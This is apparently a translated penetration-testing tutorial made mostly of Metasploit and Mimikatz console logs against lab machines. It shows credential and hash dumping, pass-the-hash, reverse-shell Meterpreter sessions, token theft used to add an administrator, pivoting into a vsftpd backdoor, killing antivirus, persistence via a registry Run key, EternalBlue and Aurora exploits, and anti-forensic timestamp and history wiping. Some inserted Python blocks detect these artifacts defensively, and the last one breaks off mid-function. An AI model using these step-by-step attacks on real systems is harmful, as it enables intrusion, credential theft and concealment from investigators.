 ## \ / ##   > https://blog.gentilkiwi.com/mimikatz
 '## v ##'   Vincent LE TOUX ( vincent.letoux@gmail.com )
  '#####'> https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 81005 (00000000:00013c6d)
Session   : Interactive from 1
User Name : 小铃铛
Domain: WIN-2VEIIKHJ7M8
Logon Server  : WIN-2VEIIKHJ7M8
Logon Time: 2022/6/27 14:58:54
SID   : S-1-5-21-2305812133-3308626755-1024735854-1000
       msv :      
        [00000003] Primary
        * Username : 小铃铛
        * Domain   : WIN-2VEIIKHJ7M8
        * LM   : 44efce164ab921caaad3b435b51404ee
        * NTLM : 32ed87bdb5fdc5e9cba88547376818d4
        * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
       tspkg :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       wdigest :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       kerberos :      
        * Username : (null)
        *

Re-entering

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49194) at 2022-06-27 17:20:14 +0800
meterpreter >

Adding a user via token impersonation

meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID  PPID  Name   Arch  Session  User Path
 ---  ----  ----   ----  -------  ---- ----
 736  644   lsass.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
meterpreter > steal_token 736
Stolen token with username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
DESKTOP-9A8VFKB\xiang
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT SERVICE\ReportServer
Window Manager\DWM-1
Impersonation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\ANONYMOUS LOGON
NT SERVICE\MSSQLFDLauncher
NT SERVICE\MSSQLSERVER
NT SERVICE\MSSQLServerOLAPService
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > add_user tom 123456 -h 192.168.0.106
[*] Attempting to add user tom to host 192.168.0.106
[+] Successfully added user
meterpreter > add_group_user "administrators" tom -h 192.168.0.106
…

Pivoting

The target is a Linux machine running vsftpd 2.3.4

Windows 10 -> Linux machine running vsftpd 2.3.4

meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.0.0/255.255.255.0
Local subnet: 192.168.5.0/255.255.255.0
Local subnet: 192.168.81.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 3...
msf6 exploit(windows/local/ask) > route add 192.168.0.0 255.255.255.0 3
[*] Route added
msf6 exploit(windows/local/ask) > route print
IPv4 Active Routing Table
=========================
 Subnet             Netmask            Gateway
 ------             -------            -------
 192.168.0.0        255.255.255.0      Session 3
[*] There are currently no IPv6 routes defined.
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.171
rhost => 192.168.0.171
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.0.171:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.171:21 - USER: 331 Please specify the password.
[+] 192.168.0.171:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.171:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 4 opened (192.168.0.106:29720 -> 192.168.0.171:6200 via session 3) at 2022-07-19 17:00:32 +0800

Running scripts with Meterpreter

Running VNC

Windows 10
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Users\xiang\AppData\Local\Temp\eiISyc.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.150:4545...
[-] Could not execute vnc: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
Running C:\Users\xiang\AppData\Local\Temp\eiISyc.exe on the Windows machine itself shows the result
meterpreter > [*] VNC Server session 3 opened (192.168.0.150:4545 -> 192.168.0.106:8611) at 2022-06-28 11:38:32 +0800
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "desktop-9a8vfkb"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
Windows 7
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\YNpMWsIZ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.150:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
[*] VNC Server session 2 opened (192.168.0.150:4545 -> 192.168.0.158:49170) at 2022-06-28 12:22:50 +0800
Desktop name "win-2veiikhj7m8"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

Process migration

meterpreter > run post/windows/manage/migrate
[*] Running module against DESKTOP-9A8VFKB
[*] Current server process: payload.exe (8716)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 9944
[+] Successfully migrated into process 9944

Shutting down antivirus software

meterpreter > run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...

Obtaining system password hashes

meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[-] Error: ArgumentError wrong number of arguments (given 4, expected 5) …

So use this instead:

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against DESKTOP-9A8VFKB
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20220628120236_default_192.168.0.106_windows.hashes_115893.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]        Obtaining the boot key...
[*]        Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*]        Obtaining the user list and keys...
[*]        Decrypting user keys...
[*]        Dumping password hints...
[*]        No users with password hints on this system
[*]        Dumping password hashes...
[+]Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]        xiang:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]        tom:1010:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
tom:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
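The dumps above hold more than material for cracking: read as pwdump lines they show blank passwords, LM hash storage still enabled, and the same NT hash on two accounts. The following is an added example, not part of the original post or of Metasploit, that triages such output; the sample input is constructed from the hashdump and sekurlsa lines in this section, and the finding names are my own.

```python
# Added example (not from the original post or from Metasploit): triage of
# pwdump-format hashdump output like the lines printed above.
from collections import defaultdict
from dataclasses import dataclass

# Well-known hashes of the empty password. The LM value is also what appears
# when LM hash storage is disabled, which is the expected state on a host.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample: the Windows 7 hashdump lines above, with the LM hash
# that sekurlsa::logonpasswords showed for the same account filled in.
SAMPLE_DUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
小铃铛:1000:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
tom:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
"""


@dataclass
class Account:
    name: str
    rid: int
    lm: str
    nt: str


def parse_pwdump(text):
    """Parse 'user:rid:lmhash:nthash:::' lines; blank or malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        if len(parts[2]) != 32 or len(parts[3]) != 32:
            continue  # progress lines and other noise end up here
        accounts.append(Account(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return accounts


def triage(accounts):
    """Return (finding, subject) pairs a defender should follow up on.

    empty-password  : NT hash of the empty string (blank password if the account is enabled)
    lm-hash-stored  : a real LM hash, so LM storage is on and the password is at most
                      14 characters and case-insensitive
    lm-password-le-7: the second LM half is the empty half, so the password has 7
                      characters or fewer
    shared-password : several accounts with the same NT hash (password reuse)
    """
    findings = []
    by_nt = defaultdict(list)
    for a in accounts:
        if a.nt == EMPTY_NT:
            findings.append(("empty-password", a.name))
        if a.lm != EMPTY_LM:
            findings.append(("lm-hash-stored", a.name))
            if a.lm[16:] == EMPTY_LM[16:]:
                findings.append(("lm-password-le-7", a.name))
        by_nt[a.nt].append(a.name)
    for nt, names in by_nt.items():
        if nt != EMPTY_NT and len(names) > 1:
            findings.append(("shared-password", ",".join(sorted(names))))
    return findings


if __name__ == "__main__":
    for finding, subject in triage(parse_pwdump(SAMPLE_DUMP)):
        print(f"{finding:17s} {subject}")
```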

Capturing traffic on the target

The target must support the rpcapd service; on Windows, installing WinPcap provides it.

meterpreter > run post/windows/manage/rpcapd_start
[*] Checking if machine DESKTOP-9A8VFKB has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Setting rpcapd as 'auto' service
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002)
[+] Rpcapd started successfully: C:\Program Files (x86)\winpcap\rpcapd.exe -d -p 2002 -n

Gathering system information

Windows 10
meterpreter > run scraper
[*] New session on 192.168.0.106:7216...
[*] Gathering basic system information...
[-] Failed to run command net view
[-] Error: Rex::TimeoutError Operation timed out.
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Users\xiang\AppData\Local\Temp\WLNUaYcc.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[-] Failed to run command reg.exe export HKLM C:\Users\xiang\AppData\Local\Temp\IymTDekJ.reg
[-] Error: Rex::TimeoutError Operation timed out.
[*]  Downloading HKLM (C:\Users\xiang\AppData\Local\Temp\IymTDekJ.reg)
[*] Exception: Rex::Post::
Windows 7
meterpreter > run scraper
[*] New session on 192.168.0.158:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Windows\TEMP\sbOwIdlG.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\Windows\TEMP\pQzbPtfD.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\Windows\TEMP\xdgVency.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\Windows\TEMP\aWoyKSRV.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\Windows\TEMP\abgTRNGl.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.0.158:445...
Windows 2003
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > run scraper
[*] New session on 192.168.0.169:1438...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\IatUIdPZ.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JcjKKLfF.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gLgAxVWq.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\KDJAycay.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\zebuwlsT.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.0.169:1438...

Persistence

meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106

-X: start the Meterpreter agent automatically when the system boots

-i 50: reconnect every 50 seconds

-p 8888: use port 8888

-r 192.168.0.106: connect back to IP 192.168.0.106

meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-2VEIIKHJ7M8_20220628.5835/WIN-2VEIIKHJ7M8_20220628.5835.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888
[*] Persistent agent script is 99674 bytes long
[+] Persistent Script written to C:\Windows\TEMP\QQxsjpmT.vbs
[*] Executing script C:\Windows\TEMP\QQxsjpmT.vbs
[+] Agent executed with PID 2580
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MdedIPrvpFMB
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MdedIPrvpFMB
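To audit a host for the autorun entry this script installs, an exported copy of the Run key can be checked offline. The block below is an added example, not code from the original post or from Metasploit; the .reg text is constructed, with the flagged value name and script path taken from the output above, and the regular expressions and helper names are my own.

```python
# Added example (not from the original post or from Metasploit): flag Run and
# RunOnce entries in a .reg export that start from a temp directory or go
# through a script host, as the persistence script above does.
import re

RUN_KEY_SUFFIXES = (
    r"\software\microsoft\windows\currentversion\run",
    r"\software\microsoft\windows\currentversion\runonce",
)
TEMP_DIR = re.compile(r"\\(temp|tmp)\\", re.I)
SCRIPT_HOST = re.compile(
    r"\.(vbs|vbe|js|jse|ps1|hta|bat|cmd)\b|\b(wscript|cscript|mshta|powershell)\b", re.I)
VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')
STRING_DATA = re.compile(r'^"((?:[^"\\]|\\.)*)"\s*$')

# Constructed sample export. Only the MdedIPrvpFMB value and its path come
# from the page; the other entries stand in for ordinary autoruns.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"MdedIPrvpFMB"="C:\\Windows\\TEMP\\QQxsjpmT.vbs"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\xiang\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer]
"ShellState"=hex:24,00,00,00
'''


def unescape(s):
    """Undo .reg string escaping (backslash-backslash and backslash-quote)."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_run_entries(reg_text):
    """Return (key, value_name, data) for REG_SZ values under Run/RunOnce keys.

    Real exports from reg.exe are UTF-16LE: open them with encoding="utf-16".
    Non-string data (hex:, hex(2):, dword:) is ignored here.
    """
    entries, current = [], None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            continue
        if current is None or not current.lower().endswith(RUN_KEY_SUFFIXES):
            continue
        m = VALUE_LINE.match(line)
        if not m:
            continue
        name, data = m.groups()
        sd = STRING_DATA.match(data)
        if sd:
            entries.append((current, unescape(name), unescape(sd.group(1))))
    return entries


def flag_entries(entries):
    """Attach reasons to entries that run from a temp directory or via a script host."""
    flagged = []
    for key, name, data in entries:
        reasons = []
        if TEMP_DIR.search(data):
            reasons.append("temp-dir")
        if SCRIPT_HOST.search(data):
            reasons.append("script")
        if reasons:
            flagged.append({"key": key, "name": name, "data": data, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in flag_entries(parse_run_entries(SAMPLE_REG)):
        print(hit["key"], hit["name"], hit["data"], hit["reasons"])
```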

Succeeded on Windows 7

Upgrading a command shell to Meterpreter

msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > setg rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -z

-z: on success, leave the session in the background instead of interacting with it

[*] Started reverse TCP handler on 192.168.0.150:4444
[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.158:445 - The target is vulnerable.
[*] 192.168.0.158:445 - Connecting to target for exploitation.
[+] 192.168.0.158:445 - Connection established for exploitation.
[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31  e Pack 1
[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.158:445 - Starting non-paged pool grooming
[+] 192.168.0.158:445 - Sending SMBv2 buffers
[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.158:445 - Sending final SMBv2 buffers.
[*] 192.168.0.158:445 - Sending last fragment of exploit packet!
[*] 192.168.0.158:445 - Receiving response from exploit packet
[+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.158:445 - Sending egg to corrupted connection.
[*] 192.168.0.158:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.0.158
[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.158:49321) at 2022-06-28 14:13:48 +0800
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Session 3 created in the background.
msf6 exploit(windows/smb/ms17_010_eternalblue) > session -u 3
[-] Unknown command: session
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.0.150:4433
msf6 exploit(windows/smb/ms17_010_eternalblue) >
[*] Sending stage (200774 bytes) to 192.168.0.158
[*] Meterpreter session 4 opened (192.168.0.150:4433 -> 192.168.0.158:49325) at 2022-06-28 14:14:39 +0800
[*] Stopping exploit/multi/handler
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 4
[*] Starting interaction with 4...
meterpreter >


meterpreter > irb
[*] Starting IRB shell...
[*] You are in the "client" (session) object


irb: warn: can't alias kill from irb_kill.
>> fs.dir.pwd
=> "C:\\Windows\\system32"

Exploiting the IE browser Aurora vulnerability (MS10-002)

Windows XP

msf6 > use exploit/windows/browser/ms10_002_aurora
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):


   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.150    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf6 exploit(windows/browser/ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf6 exploit(windows/browser/ms10_002_aurora) > set URIPATH /
URIPATH => /
msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443
lport => 443
msf6 exploit(windows/browser/ms10_002_aurora) > exploit -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:443
[*] Using URL: http://192.168.0.150/
[*] Server started.
msf6 exploit(windows/browser/ms10_002_aurora) > [*] 192.168.0.106    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption

Covering tracks

Once we have achieved our goal, sometimes it is just to deface a website and show off; or to leave a backdoor on the site and use it as a zombie host to wander around on when bored; or to plant a mining trojan. But never do any of these things: they are all illegal!

Here I only show how to clear some of the traces we leave after penetrating a system; it cannot clear everything, and completely removing the traces of an intrusion is impossible! The main effect is to raise the time and labour cost for an administrator to discover the intruder. As long as the administrator wants to investigate, no matter how you clean up, it can still be found.

The main priority is still hiding your own identity: the best approach is to go through a proxy before the penetration and clean up the traces afterwards.

Windows

PowerShell commands for changing timestamps

$(DATE) gives the current date and time;

(Get-Date) is the same as (DATE): the current date and time;

$(Get-Date "MM/DD/YYYY HH24:MI:SS") gives a specified date and time;

$(Get-Item abc.txt) gets a handle to the file;

$(Get-Item abc.txt).creationtime gets the file's creation time

$(Get-Item abc.txt).lastaccesstime gets the file's last access time

$(Get-Item abc.txt).lastwritetime gets the file's last write (modification) time

# Set the timestamps of abc.txt to the current time

(Get-Item abc.txt).creationtime=(DATE)

(Get-Item abc.txt).lastaccesstime=(DATE)

(Get-Item abc.txt).lastwritetime=(DATE)

# Set the timestamps of abc.txt to a specified time

(Get-Item abc.txt).creationtime=(Get-Date "11/04/2019 20:42:23")

(Get-Item abc.txt).lastaccesstime=(Get-Date "11/04/2019 20:42:23")

(Get-Item abc.txt).lastwritetime=(Get-Date "11/04/2019 20:42:23")

Other records

Clearing the "Run" history

  • The Start menu's "Run" dialog keeps the programs we have run through it and the paths and names of the files we opened.
  • Open the Registry Editor and go to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU key. Delete the entries you no longer need or do not want others to see.

Clearing the "Search" history

  • (1) Clearing the history of computer searches
  • Open the Registry Editor and go to the HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5647 key; delete the entries you no longer need or do not want others to see.
  • (2) Clearing the history of file searches

Open the Registry Editor and go to the HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603 key; delete the entries you no longer need or do not want others to see.

Clearing the "My Recent Documents" history

  • Right-click the taskbar and open the "Taskbar and Start Menu Properties" dialog. Click "Start Menu", "Customize", "Advanced", then the "Clear" button to clear all recently accessed documents. See Figure 2.
  • To delete only your own records, open the C:\Documents and Settings\Administrator (your own account)\Recent folder in Explorer and delete the documents you do not want others to see.

Hiding the name of the last logged-on user

Open the Registry Editor and go to the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon key. Create a new string value named DontDisplayLastUserName and set it to 1; after a reboot the last logged-on user name is no longer shown. Set it to 0 when you want it shown again.

Emptying the "Recycle Bin"

  • In Windows, simply deleting a file only moves it to the "Recycle Bin", from where it can be restored and viewed at any time. A safer approach is to hold Shift while clicking "Delete", or to right-click the desktop "Recycle Bin", choose "Properties", select "Use one setting for all drives" on the "Global" tab, tick "Do not move files to the Recycle Bin. Remove files immediately when deleted", and click "OK".

Clearing the clipboard

  • The clipboard sometimes holds too many of our secrets; if you walk away without shutting down, the next person at the machine only has to press Ctrl+V and what was on the clipboard is "stolen". There is no need to study how to empty the clipboard: just copy some unrelated content with Ctrl+C and the original content is overwritten.

Clearing the TEMP folder

  • Many applications save intermediate results of your work. Before leaving the machine, delete the temporary files under C:\ (system drive) Documents and Settings\Administrator (current user)\Local Settings\Temp.

Linux

Modifying file timestamps
ls -l test.txt
# Change the file's modification time and access time
touch -d "2018-04-18 08:00:00" test.txt
touch -t 0101080000 test
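
A defender-side counterpart to the touch -d command above, added here and not part of the original post: touch can rewrite atime and mtime, but the inode change time (ctime) is set by the kernel on every inode update, including the utime call itself, and cannot be backdated from user space, so an mtime far older than ctime is a timestomping lead. The files, directory and dates below are constructed.

```python
# Added example (not from the original post): detect backdated mtime by
# comparing it with ctime, which `touch -d` cannot set.
import os
import tempfile
from datetime import datetime


def backdate(path, when):
    """Model of `touch -d '<when>' path`: rewrites atime and mtime only."""
    ts = when.timestamp()
    os.utime(path, (ts, ts))


def timestomp_indicator(path, tolerance_s=60.0):
    """True when ctime is more than tolerance_s newer than mtime.

    chmod, chown or a rename after the last write also move ctime ahead of
    mtime, so a hit is a lead to correlate with other evidence, not proof.
    """
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > tolerance_s


def scan(directory, tolerance_s=60.0):
    """Relative paths under `directory` that trip the indicator, sorted."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            if timestomp_indicator(full, tolerance_s):
                hits.append(os.path.relpath(full, directory))
    return sorted(hits)


def demo():
    """Create two constructed files, backdate one as in the page's example,
    and return (indicator before, indicator after, scan result)."""
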